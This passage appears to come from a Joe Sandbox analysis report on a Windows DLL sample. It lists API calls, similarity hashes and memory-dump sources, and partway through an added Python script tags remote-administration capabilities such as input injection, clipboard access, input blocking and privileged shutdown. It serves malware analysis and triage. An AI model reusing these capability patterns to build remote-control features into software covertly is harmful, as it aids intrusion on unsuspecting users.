                        • ??2@YAPAXI@Z.MSVCRT(00000400,?,74DF0F10,74DF2EE0,10002CFA,?,SSSSSS), ref: 100098B8
                        • FindResourceA.KERNEL32(?,0000006C,HOST), ref: 100098D9
                        • LoadResource.KERNEL32(?,00000000), ref: 100098E1
                        • LockResource.KERNEL32(00000000), ref: 100098E8
                        • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 10009914
                        Strings
                        Yara matches
                        Similarity
                        • API ID: Resource$??2@??3@FindLoadLock
                        • String ID: HOST
                        • API String ID: 472997506-4189257289
                        • Opcode ID: 8c517b5f3bbd63520dcb8db2eedc25fc22693cc3be8b45b814adf7f57f7ccd2d
                        • Instruction ID: f64103f3c24481811ed64f621906f441ddaf9767220d4c25fce88cdf2a31ebe8
                        • Opcode Fuzzy Hash: 8c517b5f3bbd63520dcb8db2eedc25fc22693cc3be8b45b814adf7f57f7ccd2d
                        • Instruction Fuzzy Hash: A0F096B37012102BF600D6B89C8AFAB628DDB86375F050439F745DB281DA659C5193B6
                        APIs
                        • GetCurrentProcess.KERNEL32(00000028,?,?,10009E80,?,00000000,00000000,00000001), ref: 10012120
                        • OpenProcessToken.ADVAPI32(00000000,?,10009E80,?,00000000,00000000,00000001), ref: 10012127
                        • LookupPrivilegeValueA.ADVAPI32(00000000,?,?), ref: 10012157
                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000), ref: 1001216F
                        • GetLastError.KERNEL32 ref: 10012175
                        • CloseHandle.KERNEL32(?), ref: 10012186
                        Yara matches
                        Similarity
                        • API ID: ProcessToken$AdjustCloseCurrentErrorHandleLastLookupOpenPrivilegePrivilegesValue
                        • String ID:
                        • API String ID: 3398352648-0
                        • Opcode ID: d51332a10edc9ed0de53dc67db3489fbf75492b4b1e06feea115e57508ad5e88
                        • Instruction ID: 49b52ade7f2aec8d65d411800f1b7852c22338b435460913844ba7751feeb0b8
                        • Opcode Fuzzy Hash: d51332a10edc9ed0de53dc67db3489fbf75492b4b1e06feea115e57508ad5e88
                        • Instruction Fuzzy Hash: 1601B171604361ABF704DB64CC8AF9B77A9FF88B00F41891CFA858A190D6B4EC449BA1
                        APIs
                        • FindFirstFileA.KERNEL32(00000021,?,00000021,00000000,00000001), ref: 100090CF
                        • FindClose.KERNEL32(00000000), ref: 10009149
                        • CreateFileA.KERNEL32(00000021,40000000,00000002,00000000,00000002,00000080,00000000), ref: 10009161
                        • CloseHandle.KERNEL32(00000000), ref: 1000918B
                        Strings
                        Yara matches
                        Similarity
                        • API ID: CloseFileFind$CreateFirstHandle
                        • String ID: p
                        • API String ID: 3283578348-2181537457
                        • Opcode ID: 2c8b732b24ebe096cefe3b9dd28e29c66e00d67b571492c13087e5889d7322dd
                        • Instruction ID: a5be57352cfa6b7ba5ed919185f350865829bcd6be4795e4516047143afc81a4
                        • Opcode Fuzzy Hash: 2c8b732b24ebe096cefe3b9dd28e29c66e00d67b571492c13087e5889d7322dd
                        • Instruction Fuzzy Hash: 9531E2719083129BF324CF18CC4978E76E5EBC83A0F15863EF8999B2D4C6749C448B82
                        APIs
                        Strings
                        Yara matches
                        Similarity
                        • API ID: sprintf
                        • String ID: DivX503b1393$XviD%04d%c
                        • API String ID: 590974362-2051605487
                        • Opcode ID: 0846252239cfcf1f1286a590c688936e0441273455b87b29c73803bc35681fd4
                        • Instruction ID: 2301304bc23882b3204e6595b636f298ac00b2ab884358f9ed0165cb50f1dbd0
                        • Opcode Fuzzy Hash: 0846252239cfcf1f1286a590c688936e0441273455b87b29c73803bc35681fd4
                        • Instruction Fuzzy Hash: 91622779600B046BE320EE25DC41B6F73D5DF89314F24882CF9AA87B92E670FA45C795
                        APIs
                        • CoCreateInstance.OLE32(10070454,00000000,00000001,100703C4,00000000,00000000,?,1001955D,?,?,?,?), ref: 10019953
                        Strings
                        Yara matches
                        Similarity
                        • API ID: CreateInstance
                        • String ID: FriendlyName
                        • API String ID: 542301482-3623505368
                        • Opcode ID: d8a17ee3f74121fb930f19bc8dfeaf305a436513e548c624500da5f166c544a9
                        • Instruction ID: fdb4728b8914ec0ab3c4d5aec504b63f3c307faae4768be76b1c5aa8f43f9c76
                        • Opcode Fuzzy Hash: d8a17ee3f74121fb930f19bc8dfeaf305a436513e548c624500da5f166c544a9
                        • Instruction Fuzzy Hash: D45146B5204341AFC700DF58C884E5ABBE9FBC9724F508A6DF5998B251C735DC8ACB62
                        APIs
                          • Part of subcall function 10012110: GetCurrentProcess.KERNEL32(00000028,?,?,10009E80,?,00000000,00000000,00000001), ref: 10012120
                          • Part of subcall function 10012110: OpenProcessToken.ADVAPI32(00000000,?,10009E80,?,00000000,00000000,00000001), ref: 10012127
                        • ExitWindowsEx.USER32(00000000,00000000), ref: 100121B6
                          • Part of subcall function 10012110: LookupPrivilegeValueA.ADVAPI32(00000000,?,?), ref: 10012157
                          • Part of subcall function 10012110: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000), ref: 1001216F
                          • Part of subcall function 10012110: GetLastError.KERNEL32 ref: 10012175
                          • Part of subcall function 10012110: CloseHandle.KERNEL32(?), ref: 10012186
                        Strings
                        Yara matches
                        Similarity
                        • API ID: ProcessToken$AdjustCloseCurrentErrorExitHandleLastLookupOpenPrivilegePrivilegesValueWindows
                        • String ID: SeShutdownPrivilege
                        • API String ID: 3672536310-3733053543
                        • Opcode ID: 5517fef8afc03087660cbd113a6a24cd223a873bfd2325c0d88ebad1e3e5adcd
                        • Instruction ID: 67dc224a2aa9e1604c71efd48a56f6da66e88879c61f4a7f1f7eb84d1af0328f
                        • Opcode Fuzzy Hash: 5517fef8afc03087660cbd113a6a24cd223a873bfd2325c0d88ebad1e3e5adcd
                        • Instruction Fuzzy Hash: 0DC01274E406017AE510E3E05C47F4535419F10B01F509400BB447E1C1D5B5A2B4417A
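The API sets in the function records above are what an analyst reads to attribute remote-administration features to the dumped module: drive enumeration (GetLogicalDriveStringsA, GetVolumeInformationA, GetDiskFreeSpaceExA, GetDriveTypeA), switching to the input desktop and injecting synthetic mouse and keyboard events, clipboard read and write, BlockInput paired with SystemParametersInfoA(0x56 = SPI_SETPOWEROFFACTIVE) and a SendMessageA that broadcasts WM_SYSCOMMAND/SC_MONITORPOWER, the lookup of a resource named HOST, and SeShutdownPrivilege enabled just before ExitWindowsEx. The Python below is an added example, not part of the Joe Sandbox report or of the sample's code; it parses listing lines in the report's own format and tags each function with the capability its call set implies. The capability table, the two-hit threshold and the sample lines (copied from the records above and embedded as a constructed input) are this example's own choices; the argument check on SendMessageA uses the Windows constants HWND_BROADCAST (0xFFFF), WM_SYSCOMMAND (0x0112) and SC_MONITORPOWER (0xF170).

```python
"""Tag Joe Sandbox-style API listings with the capabilities they imply."""
import re
from collections import defaultdict

# Constructed sample: "APIs" lines copied from the function records above,
# one function per blank-line-separated group.
SAMPLE_LISTING = """\
• GetLogicalDriveStringsA.KERNEL32 ref: 10008511
• GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,?,00000104), ref: 10008567
• GetDiskFreeSpaceExA.KERNEL32(00000001,?,?,00000000), ref: 100085C6
• GetDriveTypeA.KERNEL32(?), ref: 1000860D

• Part of subcall function 10012B10: OpenInputDesktop.USER32(00000000,00000000,02000000), ref: 10012B61
• Part of subcall function 10012B10: SetThreadDesktop.USER32(00000000), ref: 10012BA8
• SetCursorPos.USER32(?,?,?,?,?,?,1000F5FF,?,?,00000000), ref: 1000FA38
• keybd_event.USER32(?,00000000), ref: 1000FA90
• mouse_event.USER32(00000008,00000000,00000000,00000000,00000000), ref: 1000FB6A

• OpenClipboard.USER32(00000000), ref: 1000FC2A
• GetClipboardData.USER32(00000001), ref: 1000FC36
• CloseClipboard.USER32 ref: 1000FC46

• SystemParametersInfoA.USER32(00000056,00000001,00000000,00000000), ref: 1000F937
• SendMessageA.USER32(0000FFFF,00000112,0000F170,00000002), ref: 1000F94A
• BlockInput.USER32(?), ref: 1000F988

• FindResourceA.KERNEL32(?,0000006C,HOST), ref: 100098D9
• LoadResource.KERNEL32(?,00000000), ref: 100098E1
• LockResource.KERNEL32(00000000), ref: 100098E8

• Part of subcall function 10012110: OpenProcessToken.ADVAPI32(00000000,?,10009E80,?,00000000,00000000,00000001), ref: 10012127
• ExitWindowsEx.USER32(00000000,00000000), ref: 100121B6
• Part of subcall function 10012110: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000), ref: 1001216F
"""

# One listing line: optional "Part of subcall function X:" prefix, then
# Api.MODULE(args), ref: address.  Args are absent when the report omits them.
API_LINE = re.compile(
    r"•\s*(?:Part of subcall function\s+[0-9A-Fa-f]+:\s*)?"
    r"(?P<api>[^\s.(]+)\.(?P<module>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)

# Capability table (this example's own choice): APIs that, used together in
# one function, point at a remote-administration feature.
CAPABILITIES = {
    "drive_enumeration": {"GetLogicalDriveStringsA", "GetVolumeInformationA",
                          "GetDiskFreeSpaceExA", "GetDriveTypeA"},
    "desktop_switch": {"OpenInputDesktop", "SetThreadDesktop", "GetThreadDesktop"},
    "input_injection": {"SetCursorPos", "SetCapture", "MapVirtualKeyA",
                        "keybd_event", "mouse_event"},
    "clipboard_access": {"OpenClipboard", "GetClipboardData", "SetClipboardData",
                         "EmptyClipboard"},
    "input_blocking": {"BlockInput"},
    "embedded_config": {"FindResourceA", "LoadResource", "LockResource"},
    "token_privilege": {"OpenProcessToken", "LookupPrivilegeValueA",
                        "AdjustTokenPrivileges"},
    "shutdown": {"ExitWindowsEx"},
}


def parse_listing(text):
    """Split the listing into functions; each is a list of (api, module, args, ref)."""
    functions = []
    for block in re.split(r"\n\s*\n", text.strip()):
        calls = []
        for line in block.splitlines():
            m = API_LINE.search(line)
            if m:
                args = [a for a in (m.group("args") or "").split(",") if a]
                calls.append((m.group("api"), m.group("module"), args, m.group("ref")))
        if calls:
            functions.append(calls)
    return functions


def classify(calls):
    """Return the set of capability tags implied by one function's calls."""
    apis = {api for api, _, _, _ in calls}
    tags = set()
    for name, needed in CAPABILITIES.items():
        # single-API rules fire on one hit; clusters need at least two members
        if len(apis & needed) >= min(2, len(needed)):
            tags.add(name)
    for api, _, args, _ in calls:
        # Argument-aware rule: SendMessageA(HWND_BROADCAST, WM_SYSCOMMAND,
        # SC_MONITORPOWER, ...) switches the display off (lParam 2) or on (-1).
        if api == "SendMessageA" and args[:3] == ["0000FFFF", "00000112", "0000F170"]:
            tags.add("monitor_power_control")
    if {"desktop_switch", "input_injection"} <= tags:
        tags.add("remote_desktop_control")
    if {"token_privilege", "shutdown"} <= tags:
        tags.add("privileged_shutdown")
    return tags


def tag_listing(text):
    """Map each capability tag to the call sites of the functions showing it."""
    found = defaultdict(list)
    for calls in parse_listing(text):
        for tag in classify(calls):
            found[tag].append(calls[0][3])
    return dict(found)


if __name__ == "__main__":
    for tag, refs in sorted(tag_listing(SAMPLE_LISTING).items()):
        print(f"{tag:24s} {', '.join(refs)}")
```

Run as a script it prints one line per tag with the first call site of every function that earned it. Tags derived from API names alone are triage hints rather than proof, since OpenClipboard or SendMessageA also occur in benign code; the two-member threshold and the argument check on the monitor-power call are there to keep single incidental calls from firing, and further records on this page can be folded in by extending CAPABILITIES.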
                        Strings
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: hXMV$hXMV
                        • API String ID: 0-400149659
                        • Opcode ID: ab5e3e21831d743e989cfefce99af3eb928d176e77e6d9bac1422ef75111606d
                        • Instruction ID: 33c989065322407e25cb8f1f5bd2ca5453694296b4eaa1aa3ba59fb04f65da8f
                        • Opcode Fuzzy Hash: ab5e3e21831d743e989cfefce99af3eb928d176e77e6d9bac1422ef75111606d
                        • Instruction Fuzzy Hash: DDF0F672D08785ABD700CB4ADC51BAFFBB8E745B20F34462AF564537C1D33A18018BA0
                        Strings
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: p
                        • API String ID: 0-2181537457
                        • Opcode ID: 7c39db9e0ec0d906b9108c65f53e53820b3fba5746f7ce5fd581395e1d022252
                        • Instruction ID: 41e86213a1f147a59c20fa21054d289a45626ccde17ba1540711548f6703f367
                        • Opcode Fuzzy Hash: 7c39db9e0ec0d906b9108c65f53e53820b3fba5746f7ce5fd581395e1d022252
                        • Instruction Fuzzy Hash: 9A5218B1604B019FD354CF68C884A6BB7E6FBC8344F148A2DF99A93350EB74EA45CB51
                        Strings
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: `
                        • API String ID: 0-2679148245
                        • Opcode ID: 507f68a417bd9c17953693496fa3247dced6402129aa46c9e256644bf2b629c8
                        • Instruction ID: 8edb96b3a4272df0549e4926b4838a373d3f24ba3163c90b0bd51ed45d6e35ac
                        • Opcode Fuzzy Hash: 507f68a417bd9c17953693496fa3247dced6402129aa46c9e256644bf2b629c8
                        • Instruction Fuzzy Hash: 765236B16047019FD354CF28CC84AABB7EAFBC8304F558A2DF99A87351D774AA058B52
                        Strings
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: p
                        • API String ID: 0-2181537457
                        • Opcode ID: 26f970cb58f95648d150a26665e30c163f8b2854cc42efe924966888af4b153d
                        • Instruction ID: 5c715eeafa0f921a3a09a0f77ddea77a334f01894216062ae2a35cf0c6aa5065
                        • Opcode Fuzzy Hash: 26f970cb58f95648d150a26665e30c163f8b2854cc42efe924966888af4b153d
                        • Instruction Fuzzy Hash: A02232B16087009FD354CF28C884AABB7EAFBC8704F14891DF99AD7350DB74E9458B62
                        Strings
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: @
                        • API String ID: 0-2766056989
                        • Opcode ID: 4f7ec2bb730e4c4423672012a11971052ec900d1ad9542e9cd4d0756fd667301
                        • Instruction ID: 6611b376b253f343187c0e507ae7ed33692c1192b3b8083b00200ee4902dd6cd
                        • Opcode Fuzzy Hash: 4f7ec2bb730e4c4423672012a11971052ec900d1ad9542e9cd4d0756fd667301
                        • Instruction Fuzzy Hash: F8E1F2B5608705AFD344CF64CC84AABB7E9FBC8704F04892DF99A97351DB31E9058B62
                        APIs
                        • NtdllDefWindowProc_A.NTDLL(?,?,?,?), ref: 10002934
                        Yara matches
                        Similarity
                        • API ID: NtdllProc_Window
                        • String ID:
                        • API String ID: 4255912815-0
                        • Opcode ID: cd21bd2416f1a32ff3a22d08b90a7fc46063fe3e610cbd224e1e98767f6be9da
                        • Instruction ID: 58df3dc0681e3f39cf6c8608bd8a8251fa6d00a740b542f493d238d21b34862f
                        • Opcode Fuzzy Hash: cd21bd2416f1a32ff3a22d08b90a7fc46063fe3e610cbd224e1e98767f6be9da
                        • Instruction Fuzzy Hash: 0CC0EAB9608351AFD604CB54C888D6BB7E9EBC8340F00C909B59A83254C770E840CB22
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 9d9f16a090a9822c87b65925c36c01c83da2fd69e56d3b890f8559d485a959b6
                        • Instruction ID: 8d0f39a7764e857a0111dc6b696445a89f71c23b2c4544006f6d76332cd398eb
                        • Opcode Fuzzy Hash: 9d9f16a090a9822c87b65925c36c01c83da2fd69e56d3b890f8559d485a959b6
                        • Instruction Fuzzy Hash: 7982463454C78A4FC735EFADC8D0495BBA3AFCA204F0DC6B8DA844F35BEA7165198681
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d2e9f475817bb9b1abdccdb28714aea6e5f54fc4f7c16525ef0626b9c5e327aa
                        • Instruction ID: bf144427b0604054fe254b5ae95ac1905048750d301a382c030cce08f61c0ac5
                        • Opcode Fuzzy Hash: d2e9f475817bb9b1abdccdb28714aea6e5f54fc4f7c16525ef0626b9c5e327aa
                        • Instruction Fuzzy Hash: 0882743460C34A4FC725EFADC8D0496BBA3AFCA204F4DD6B8DA944F35BE97161198781
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 865f681f011bfc51ed7531c062016a43634e4af7089a4ce826a7ed70d820cb01
                        • Instruction ID: 05d3d029854a830102d08cb7be6a27ab2c98881991a7aac3d21bbd0d20da86fc
                        • Opcode Fuzzy Hash: 865f681f011bfc51ed7531c062016a43634e4af7089a4ce826a7ed70d820cb01
                        • Instruction Fuzzy Hash: 6C8259B16046459FD758CF28C880BAAB7E9FF88304F108A2DE95ACB345E730F955CB95
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 9de5fdc5f4b3a874fde3799546c37746d74c51cdfaec63d27c81076e59b1a729
                        • Instruction ID: ef95bd9b3f0fc480198c8159119873fdc878575e5a523b2807feb87c22ff7938
                        • Opcode Fuzzy Hash: 9de5fdc5f4b3a874fde3799546c37746d74c51cdfaec63d27c81076e59b1a729
                        • Instruction Fuzzy Hash: FB72613183AF7685D7C3AF608690C66F3A1BF9B146B070D568904C6819EF7FD18FA225
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6284b2869b8ba103dccce2766efb5f186fb82f7e3dd95297e512dd59926c7121
                        • Instruction ID: a64c3d111ef276c41d9f1e34a25e8f554a700bfa178fab4cad2ff45adc5e7096
                        • Opcode Fuzzy Hash: 6284b2869b8ba103dccce2766efb5f186fb82f7e3dd95297e512dd59926c7121
                        • Instruction Fuzzy Hash: 4772583064D38E4FC725EFADC4D0496BBA3AFCA204F09C5BCDA944B35BEA7165198781
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: df2f7d2503e981415cd3f8a09e996b88b58b6ff9c42269d1c0431f4012811861
                        • Instruction ID: 29453f4a37b923f19e096f4eae6415af50d0d9c6d3d62dff1a02729bf252c972
                        • Opcode Fuzzy Hash: df2f7d2503e981415cd3f8a09e996b88b58b6ff9c42269d1c0431f4012811861
                        • Instruction Fuzzy Hash: 8572753064C78E4FC725EFAD94D04A5BBA3AFCA204F4DC5BCDA844F32BE97165198681
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d16f5c9226d3d431dcdf8151fe05047d972e302cbc1e418d63e5ae1e1878a2b1
                        • Instruction ID: 4e92bd89d6823c281eb356d105abb4fe3538298a00b453003041c104d6b07ca4
                        • Opcode Fuzzy Hash: d16f5c9226d3d431dcdf8151fe05047d972e302cbc1e418d63e5ae1e1878a2b1
                        • Instruction Fuzzy Hash: 0872473154C78A4FC725EFADC8D0495BBB3AFCE304F09C6B8D9844B35BEAB165198681
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f4417fb52c18201ff84e2c13c7527f57d1c496bcf94ab97620951fb99038a32a
                        • Instruction ID: d799e697c3810950acda283a30624a9e5e463db08a179f8dfb666a6dd3b161fc
                        • Opcode Fuzzy Hash: f4417fb52c18201ff84e2c13c7527f57d1c496bcf94ab97620951fb99038a32a
                        • Instruction Fuzzy Hash: A5424433D0C5A24BD729CB3E446449AFBE35F89208B0FD6F98D9DAB357D961980982C4
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 69259b9b101984c7ac87dc48b963b63b975764a80d8241cb9a7b62c0cc035241
                        • Instruction ID: 66a1101def5172d1ff3a88be3276421be9c1692652b0fd374f3964baa24fda55
                        • Opcode Fuzzy Hash: 69259b9b101984c7ac87dc48b963b63b975764a80d8241cb9a7b62c0cc035241
                        • Instruction Fuzzy Hash: 24526135839F3685E7C3AF60CA90C66F3A1BF9B146B070D568504C6819EF7F918FA225
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f03a5385daa93753dac5558406462cd99082c2bb9a566bb8dcb4c9f34d07ea9e
                        • Instruction ID: 047e855900e161c1b4691d9c58c49a267d1314ca22ac9589435d89b10c5abb32
                        • Opcode Fuzzy Hash: f03a5385daa93753dac5558406462cd99082c2bb9a566bb8dcb4c9f34d07ea9e
                        • Instruction Fuzzy Hash: 38526F25839F7685E7C3AF60CA90C66F3A1BFDB146B070D568504C6819EF7F918FA224
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 88610b2ba1c26edf79dbbf285fa8b5691e9db603c0584d2a4aaca3cb702eac29
                        • Instruction ID: b33faff0bfaa9b3feed16c81cd7083fe3fb1e87c119ba43ae76562705061882e
                        • Opcode Fuzzy Hash: 88610b2ba1c26edf79dbbf285fa8b5691e9db603c0584d2a4aaca3cb702eac29
                        • Instruction Fuzzy Hash: 204260327096874ED316CF7E8894595FFA3AFCA10975FC6B4C58C4F26FE971A11A8280
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: eff47ed2c491402c8aba499e684f26fd1181f6078f00655b0b131c31b1bfe11d
                        • Instruction ID: 7d04eeb3e1097de58734f10055b9ba5447837d56780800726c3ce8f69eb08f97
                        • Opcode Fuzzy Hash: eff47ed2c491402c8aba499e684f26fd1181f6078f00655b0b131c31b1bfe11d
                        • Instruction Fuzzy Hash: 284272327096874ED316CF7E8894595FFA3AFCA10975FC6B4C58C4F26FE971A11A8280
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7a07eadbf812cff40b8f3807888a83b4f0f6fa3f345c6ad3a8316c903df405d9
                        • Instruction ID: 6b5414d4345798640829ca31354768b218e6749a5615309ccb3288a438b8cb8a
                        • Opcode Fuzzy Hash: 7a07eadbf812cff40b8f3807888a83b4f0f6fa3f345c6ad3a8316c903df405d9
                        • Instruction Fuzzy Hash: 84522035839F7685E7C3AF61CA90C66F3A1BF9B146B070C568504C6819EF7F918FA224
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b725c0f8d0797b1647154334aae566fa37c0ec9fc7561b20cc3fb6e363daa6f4
                        • Instruction ID: 5fc62c4f19258d29fef22b0bae1b7e542bdb6c5f1159031221c04a4912e5e698
                        • Opcode Fuzzy Hash: b725c0f8d0797b1647154334aae566fa37c0ec9fc7561b20cc3fb6e363daa6f4
                        • Instruction Fuzzy Hash: B5326F337096864FD319CF7E98945A6FF93AFC624474FC6B4C58C4B26BED71A11A8240
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2314a99fbc011abeec4cc6f47eb4bb73a08415b38a90e55644bc8aa34262536c
                        • Instruction ID: 4e3fecdbc45191d237355336c2bc862de9bf2524df3350cdba2157c6aa029cd8
                        • Opcode Fuzzy Hash: 2314a99fbc011abeec4cc6f47eb4bb73a08415b38a90e55644bc8aa34262536c
                        • Instruction Fuzzy Hash: BB325F337096874ED319CF7E88945A5FFA36FC614474FC6B4849C4B26BED71A11A8240
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 664564b5d0ea2862d0697641a35d868292a1763789cb1bf048ab68a03c3ab259
                        • Instruction ID: 5dd7def7bee200a55d12714c244b377831d9b8d3cb3513de74090d87f66c4443
                        • Opcode Fuzzy Hash: 664564b5d0ea2862d0697641a35d868292a1763789cb1bf048ab68a03c3ab259
                        • Instruction Fuzzy Hash: 8D329776A187928FD325CF19C85036AB7E2FFC8305F1A4A3DD9989B751D674EC018B82
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 66a76b5fd470a531a758f836ee706dca18ac95b3ab087bd1a3146d9ec62a05cb
                        • Instruction ID: 49e1d727e53ae52dc0cfbdce63f1bbc302d6bf2bfe7a2f7bfe8c67b612bb59ab
                        • Opcode Fuzzy Hash: 66a76b5fd470a531a758f836ee706dca18ac95b3ab087bd1a3146d9ec62a05cb
                        • Instruction Fuzzy Hash: DA329376A187918FD325CF18C89136AB7E1FFC8345F160A3DD9999B382DA74EC019B42
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: cc01dbcf9de47fa39d4bb7184223b2072b1a21903614d6e796e1716c3aff668e
                        • Instruction ID: 65b02adf5abd5573e5ba948fb5521d631a4944baaa3c0ee8107a2b36bcf058db
                        • Opcode Fuzzy Hash: cc01dbcf9de47fa39d4bb7184223b2072b1a21903614d6e796e1716c3aff668e
                        • Instruction Fuzzy Hash: 19224D313080C24BDB2DCF7D94B49BEAFE39F9A34875FD1BD858B8B6A7D91194198204
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c4d6a84941d2bb1fad9f4ee5973de4e888d5c07188cb1e2dd2c8a44c231a692c
                        • Instruction ID: 432c480cec7f526fb0131e6304dd4af4c2fc91bd75be602d64080f716235d4bb
                        • Opcode Fuzzy Hash: c4d6a84941d2bb1fad9f4ee5973de4e888d5c07188cb1e2dd2c8a44c231a692c
                        • Instruction Fuzzy Hash: 09221E217081C24BDB1DDF7D88B5ABABFE39F8A20471FD5BD818BCB667DD11901A8244
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmp
